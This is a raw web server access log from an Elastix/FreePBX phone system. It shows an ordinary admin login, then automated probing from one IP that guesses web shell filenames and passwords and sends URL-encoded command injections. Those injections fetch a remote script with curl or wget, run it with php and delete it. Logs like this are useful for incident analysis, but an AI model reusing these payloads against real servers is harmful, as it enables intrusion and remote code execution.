    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/css/custom.css HTTP/1.1" 200 54
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/font-icons/font-awesome/css/font-awesome.min.css HTTP/1.1" 200 26711
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/font-icons/entypo/css/entypo.css HTTP/1.1" 200 17909
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/css/neon-forms.css HTTP/1.1" 200 180501
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/widgetcss/colorpicker.css HTTP/1.1" 200 3176
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/css/smoothness/theme.css HTTP/1.1" 200 17279
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-edwidgets.js HTTP/1.1" 200 3152
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-migrate-1.2.1.js HTTP/1.1" 200 16621
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-ui-1.11.4.min.js HTTP/1.1" 200 240427
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/css/neon-theme.css HTTP/1.1" 200 178246
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-upl-colResizable-1.5.min.js HTTP/1.1" 200 5852
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-upl-blockUI.js HTTP/1.1" 200 19910
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-1.11.2.min.js HTTP/1.1" 200 95931
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-ui-timepicker-addon.js HTTP/1.1" 200 78611
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-upl-colorpicker.js HTTP/1.1" 200 17292
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-upl-easing.1.3.js HTTP/1.1" 200 8097
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/gsap/main-gsap.js HTTP/1.1" 200 99007
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/bootstrap.js HTTP/1.1" 200 58330
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/joinable.js HTTP/1.1" 200 119975
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/resizeable.js HTTP/1.1" 200 2406
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/neon-api.js HTTP/1.1" 200 13926
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/jquery.validate.min.js HTTP/1.1" 200 21068
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/neon-custom.js HTTP/1.1" 200 48302
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/neon-login.js HTTP/1.1" 200 9031
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/neon-demo.js HTTP/1.1" 200 1964
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/images/elastix_logo_mini.png HTTP/1.1" 200 6100
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/font-icons/entypo/font/entypo.woff?71205724 HTTP/1.1" 200 40320
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /favicon.ico HTTP/1.1" 200 99678
    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "POST / HTTP/1.1" 200 5409
    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /themes/tenant/css/bootstrap.css HTTP/1.1" 200 218495
    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/js/jquery/widgetcss/edwidgets.css HTTP/1.1" 200 1585
    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/js/jquery/widgetcss/jquery-ui-timepicker-addon.css HTTP/1.1" 200 1705
    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/js/jquery/css/smoothness/jquery-ui.min.css HTTP/1.1" 200 30021
    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/js/jquery/css/smoothness/theme.css HTTP/1.1" 200 17279
    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/font-icons/entypo/css/entypo.css HTTP/1.1" 200 17909
    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/font-icons/font-awesome/css/font-awesome.min.css HTTP/1.1" 200 26711
    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/js/jquery/widgetcss/colorpicker.css HTTP/1.1" 200 3176
    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /themes/tenant/css/neon-theme.css HTTP/1.1" 200 178246
    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /themes/tenant/css/neon-forms.css HTTP/1.1" 200 180501
    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /themes/tenant/css/custom.css HTTP/1.1" 200 54
    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /themes/tenant/css/neon-core.css HTTP/1.1" 200 228653
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "POST / HTTP/1.1" 302 -
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /index.php HTTP/1.1" 200 70583
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/css/bootstrap.css HTTP/1.1" 200 218495
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/styles.css HTTP/1.1" 200 32972
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/help.css HTTP/1.1" 200 359
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/header.css HTTP/1.1" 200 9165
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/content.css HTTP/1.1" 200 7067
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/rightbar.css HTTP/1.1" 200 1254
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/jquery/widgetcss/jquery-ui-timepicker-addon.css HTTP/1.1" 200 1705
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/jquery/css/smoothness/jquery-ui.min.css HTTP/1.1" 200 30021
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/jquery/css/smoothness/theme.css HTTP/1.1" 200 17279
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/css/1_style.css HTTP/1.1" 200 3056
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/css/neon-core.css HTTP/1.1" 200 228653
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/applet.css HTTP/1.1" 200 1381
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/jquery/widgetcss/colorpicker.css HTTP/1.1" 200 3176
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/table.css HTTP/1.1" 200 6473
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/jquery/widgetcss/edwidgets.css HTTP/1.1" 200 1585
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/font-icons/entypo/css/entypo.css HTTP/1.1" 200 17909
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/font-icons/font-awesome/css/font-awesome.min.css HTTP/1.1" 200 26711
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/css/custom.css HTTP/1.1" 200 54
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/widgets.css HTTP/1.1" 200 485
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/base.js HTTP/1.1" 200 10924
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/sticky_note/sticky_note.css HTTP/1.1" 200 1825
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/sticky_note/sticky_note.js HTTP/1.1" 200 3207
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/js/1_javascript.js HTTP/1.1" 200 2324
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/iframe.js HTTP/1.1" 200 314
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/css/neon-theme.css HTTP/1.1" 200 178246
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/css/neon-forms.css HTTP/1.1" 200 180501
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/js/3_jquery.flot.time.js HTTP/1.1" 200 11768
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/js/5_justgage-1.1.0.min.js HTTP/1.1" 200 14662
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/js/4_raphael-2.1.4.min.js HTTP/1.1" 200 92764
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/js/2_jquery.flot.js HTTP/1.1" 200 122971
    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /themes/tenant/images/elastix_logo_mini2.png HTTP/1.1" 200 5487
    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /themes/tenant/images/Icon-user.png HTTP/1.1" 200 21664
    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /themes/tenant/images/modalbox_bg.png HTTP/1.1" 200 1000
    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /libs/font-icons/font-awesome/fonts/fontawesome-webfont.woff2?v=4.4.0 HTTP/1.1" 200 64464
    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /libs/js/jquery/css/smoothness/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1" 200 208
    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=registration&action=isRegistered&rawmode=yes HTTP/1.1" 200 178
    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=PerformanceGraphic&action=getContent HTTP/1.1" 200 7518
    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=SystemResources&action=getContent HTTP/1.1" 200 2339
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/SystemResources/js/javascript.js?=1497064534974 HTTP/1.1" 200 1363
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/SystemResources/tpl/css/styles.css HTTP/1.1" 200 223
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/images/applet_divisor.png HTTP/1.1" 200 998
    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=CommunicationActivity&action=getContent HTTP/1.1" 200 2155
    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=HardDrives&action=getContent HTTP/1.1" 200 1913
    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=ProcessesStatus&action=getContent HTTP/1.1" 200 8406
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/CommunicationActivity/js/javascript.js?
    =1497064534975 HTTP/1.1" 200 628
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/CommunicationActivity/tpl/css/styles.css HTTP/1.1" 200 826
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/HardDrives/tpl/css/styles.css HTTP/1.1" 200 1065
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/HardDrives/js/javascript.js?=1497064534976 HTTP/1.1" 200 565
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/HardDrives/images/light_freespace.png HTTP/1.1" 200 958
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/HardDrives/images/light_usedspace.png HTTP/1.1" 200 958
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/tpl/css/styles.css HTTP/1.1" 200 1944
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/js/javascript.js?
    =1497064534977 HTTP/1.1" 200 2683
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_pbx.png HTTP/1.1" 200 2183
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_im.png HTTP/1.1" 200 2680
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/loading.gif HTTP/1.1" 200 2767
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_arrowdown.png HTTP/1.1" 200 1015
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_fax.png HTTP/1.1" 200 1506
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_headphones.png HTTP/1.1" 200 1905
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_www.png HTTP/1.1" 200 2655
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_db.png HTTP/1.1" 200 1637
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_email.png HTTP/1.1" 200 1998
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_arrowdown-disabled.png HTTP/1.1" 200 190
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/bgicon.png HTTP/1.1" 200 1018
    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=News&action=getContent HTTP/1.1" 200 4889
    76.108.242.230 - - [09/Jun/2017:23:15:38 -0400] "GET /modules/dashboard/applets/News/tpl/css/styles.css HTTP/1.1" 200 934
    76.108.242.230 - - [09/Jun/2017:23:15:41 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=SystemResources&action=updateStatus HTTP/1.1" 200 98
    76.108.242.230 - - [09/Jun/2017:23:15:41 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=CommunicationActivity&action=updateStatus HTTP/1.1" 200 83
    76.108.242.230 - - [09/Jun/2017:23:15:44 -0400] "GET /index.php?menu=pbxadmin HTTP/1.1" 500 -
    76.108.242.230 - - [09/Jun/2017:23:15:45 -0400] "GET /index.php HTTP/1.1" 500 -
    92.114.32.161 - - [09/Jun/2017:23:39:42 -0400] "GET /vtigercrm/vtigerservice.php HTTP/1.1" 404 225
    92.114.32.161 - - [09/Jun/2017:23:39:43 -0400] "GET /vtigercrm/vtigerservice.php HTTP/1.1" 404 225
    92.114.32.161 - - [09/Jun/2017:23:53:55 -0400] "GET /recordings/ HTTP/1.1" 500 -
    92.114.32.161 - - [09/Jun/2017:23:53:56 -0400] "GET /recordings/ HTTP/1.1" 500 -
    92.114.32.161 - - [10/Jun/2017:00:17:47 -0400] "GET /recordings/ HTTP/1.1" 500 -
    92.114.32.161 - - [10/Jun/2017:00:17:47 -0400] "GET / HTTP/1.0" 400 362
    92.114.32.161 - - [10/Jun/2017:00:24:24 -0400] "GET /vtigercrm/vtigerservice.php HTTP/1.1" 404 225
    92.114.32.161 - - [10/Jun/2017:00:24:24 -0400] "GET / HTTP/1.0" 400 362
    163.172.64.146 - - [10/Jun/2017:04:53:29 -0400] "GET /a2billing/admin/Public/index.php HTTP/1.1" 404 230
    51.15.12.13 - - [10/Jun/2017:04:55:41 -0400] "GET /recordings/index.php HTTP/1.1" 500 -
    51.15.12.13 - - [10/Jun/2017:04:55:42 -0400] "POST /admin/ajax.php?module=music HTTP/1.1" 404 212
    51.15.12.13 - - [10/Jun/2017:04:55:44 -0400] "POST /admin/ajax.php?module=blacklist HTTP/1.1" 404 212
    51.15.12.13 - - [10/Jun/2017:04:55:45 -0400] "POST /admin/ajax.php?module=recordings HTTP/1.1" 404 212
    51.15.12.13 - - [10/Jun/2017:04:55:46 -0400] "GET /admin/ajax.php HTTP/1.1" 404 212
    51.15.12.13 - - [10/Jun/2017:04:55:47 -0400] "GET /admin/config.php?display=OpenVAS&handler=api&file=OpenVAS&module=OpenVAS&function=system&args=id HTTP/1.1" 404 214
    51.15.12.13 - - [10/Jun/2017:04:55:48 -0400] "GET /admin/modules/backup/page.backup.php HTTP/1.1" 404 234
    51.15.12.13 - - [10/Jun/2017:04:55:49 -0400] "POST /vtigercrm/phprint.php HTTP/1.1" 404 219
    51.15.12.13 - - [10/Jun/2017:04:55:50 -0400] "POST / HTTP/1.1" 200 5409
    51.15.12.13 - - [10/Jun/2017:04:55:51 -0400] "POST /admin/modules/admindashboard/phpsysinfo/common_admin_functions.php?c=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 404 264
    51.15.12.13 - - [10/Jun/2017:04:55:51 -0400] "POST /recordings/jeep.php HTTP/1.1" 403 221
    51.15.12.13 - - [10/Jun/2017:04:55:52 -0400] "POST /admin/bootstrap.inc.php?mgp=danc3Uf%40t HTTP/1.1" 404 221
    51.15.12.13 - - [10/Jun/2017:04:55:52 -0400] "POST /recordings/a7a.php HTTP/1.1" 403 220
    51.15.12.13 - - [10/Jun/2017:04:55:53 -0400] "POST /recordings/emad-shell.php HTTP/1.1" 403 227
    51.15.12.13 - - [10/Jun/2017:04:55:53 -0400] "POST /recordings/emad.php HTTP/1.1" 403 221
    51.15.12.13 - - [10/Jun/2017:04:55:54 -0400] "POST /recordings/cmd.php?pass=lollol&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
    51.15.12.13 - - [10/Jun/2017:04:55:54 -0400] "POST /recordings/mcd.php?pass=lollol&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
    51.15.12.13 - - [10/Jun/2017:04:55:54 -0400] "POST /recordings/dmc.php?pass=lollol&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
    51.15.12.13 - - [10/Jun/2017:04:55:55 -0400] "POST /recordings/cmd.php?pass=dandan2017&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
    51.15.12.13 - - [10/Jun/2017:04:55:55 -0400] "POST /recordings/mcd.php?pass=dandan2017&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
    51.15.12.13 - - [10/Jun/2017:04:55:56 -0400] "POST /recordings/dmc.php?pass=dandan2017&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
    51.15.12.13 - - [10/Jun/2017:04:55:56 -0400] "POST /recordings/cmd.php?pass=test&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
    51.15.12.13 - - [10/Jun/2017:04:55:57 -0400] "POST /recordings/mcd.php?pass=test&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
    51.15.12.13 - - [10/Jun/2017:04:55:57 -0400] "POST /recordings/dmc.php?pass=test&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
    51.15.12.13 - - [10/Jun/2017:04:55:58 -0400] "POST /recordings/config.amportal.php HTTP/1.1" 403 232
    51.15.12.13 - - [10/Jun/2017:04:55:58 -0400] "POST /recordings/scan.php HTTP/1.1" 403 221
    51.15.12.13 - - [10/Jun/2017:04:55:59 -0400] "POST /vtigercrm/a7a.php HTTP/1.1" 404 215
    51.15.12.13 - - [10/Jun/2017:04:55:59 -0400] "POST /vtigercrm/Hima.php HTTP/1.1" 404 216
    51.15.12.13 - - [10/Jun/2017:04:56:00 -0400] "POST /vtigercrm/xXx-mat.php HTTP/1.1" 404 219
    51.15.12.13 - - [10/Jun/2017:04:56:00 -0400] "POST /vtigercrm/Himaa.php HTTP/1.1" 404 217
    51.15.12.13 - - [10/Jun/2017:04:56:01 -0400] "POST /recordings/3Zz.php HTTP/1.1" 403 220
    51.15.12.13 - - [10/Jun/2017:04:56:01 -0400] "POST /vtigercrm/3Zz.php HTTP/1.1" 404 215
    51.15.12.13 - - [10/Jun/2017:04:56:02 -0400] "POST /vtigercrm/zizo.php HTTP/1.1" 404 216
    51.15.12.13 - - [10/Jun/2017:04:56:02 -0400] "POST /vtigercrm/ops.php HTTP/1.1" 404 215
    51.15.12.13 - - [10/Jun/2017:04:56:03 -0400] "POST /vtigercrm/xXx-ELMAYET-xXx.php HTTP/1.1" 404 227
    51.15.12.13 - - [10/Jun/2017:04:56:03 -0400] "POST /zz.php.call HTTP/1.1" 404 209
    51.15.12.13 - - [10/Jun/2017:04:56:04 -0400] "POST /vtigercrm/z.php?pass=angel HTTP/1.1" 404 213
    51.15.12.13 - - [10/Jun/2017:04:56:04 -0400] "POST /z.php?pass=angel HTTP/1.1" 404 203
    51.15.12.13 - - [10/Jun/2017:04:56:05 -0400] "POST /recordings/lol.php HTTP/1.1" 403 220
    51.15.12.13 - - [10/Jun/2017:04:56:05 -0400] "POST /recordings/badr2.php HTTP/1.1" 403 222
    51.15.12.13 - - [10/Jun/2017:04:56:06 -0400] "POST /recordings/Go.php HTTP/1.1" 403 219
    51.15.12.13 - - [10/Jun/2017:04:56:06 -0400] "POST /recordings/info.php HTTP/1.1" 403 221
    51.15.12.13 - - [10/Jun/2017:04:56:07 -0400] "POST /recordings/11.php HTTP/1.1" 403 219
    51.15.12.13 - - [10/Jun/2017:04:56:07 -0400] "POST /vtigercrm/moaz.php HTTP/1.1" 404 216
    51.15.12.13 - - [10/Jun/2017:04:56:08 -0400] "POST /vtigercrm/11.php HTTP/1.1" 404 214
    51.15.12.13 - - [10/Jun/2017:04:56:08 -0400] "POST /11.php HTTP/1.1" 404 204
    51.15.12.13 - - [10/Jun/2017:04:56:09 -0400] "POST /recordings/a8a.php HTTP/1.1" 403 220
    51.15.12.13 - - [10/Jun/2017:04:56:09 -0400] "POST /wav.php HTTP/1.1" 404 205
    51.15.12.13 - - [10/Jun/2017:04:56:10 -0400] "POST /_asterisk/V-E-M.php?268e31510577740=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 404 217
    51.15.12.13 - - [10/Jun/2017:04:56:10 -0400] "POST /x1.php HTTP/1.1" 404 204
    51.15.12.13 - - [10/Jun/2017:04:56:11 -0400] "POST /recordings/webadmin.php HTTP/1.1" 403 225
    51.15.12.13 - - [10/Jun/2017:04:56:11 -0400] "POST /panel/webadmin.php HTTP/1.1" 404 216
    51.15.12.13 - - [10/Jun/2017:04:56:12 -0400] "POST /webadmin.php HTTP/1.1" 404 210
    51.15.12.13 - - [10/Jun/2017:04:56:12 -0400] "POST /panel/main.php HTTP/1.1" 404 212
    51.15.12.13 - - [10/Jun/2017:04:56:13 -0400] "POST /panel/main.php?act=cmd HTTP/1.1" 404 212
    51.15.12.13 - - [10/Jun/2017:04:56:13 -0400] "POST /panel/main.php.1 HTTP/1.1" 404 214
    51.15.12.13 - - [10/Jun/2017:04:56:13 -0400] "POST /panel/main.php.1?act=cmd HTTP/1.1" 404 214
    51.15.12.13 - - [10/Jun/2017:04:56:13 -0400] "POST /panel/main.php.2 HTTP/1.1" 404 214
    51.15.12.13 - - [10/Jun/2017:04:56:14 -0400] "POST /panel/main.php.2?act=cmd HTTP/1.1" 404 214
    51.15.12.13 - - [10/Jun/2017:04:56:14 -0400] "POST /recordings/main.php HTTP/1.1" 403 221
    51.15.12.13 - - [10/Jun/2017:04:56:14 -0400] "POST /recordings/main.php?act=cmd HTTP/1.1" 403 221
    51.15.12.13 - - [10/Jun/2017:04:56:14 -0400] "POST /recordings/main.php.1 HTTP/1.1" 403 223
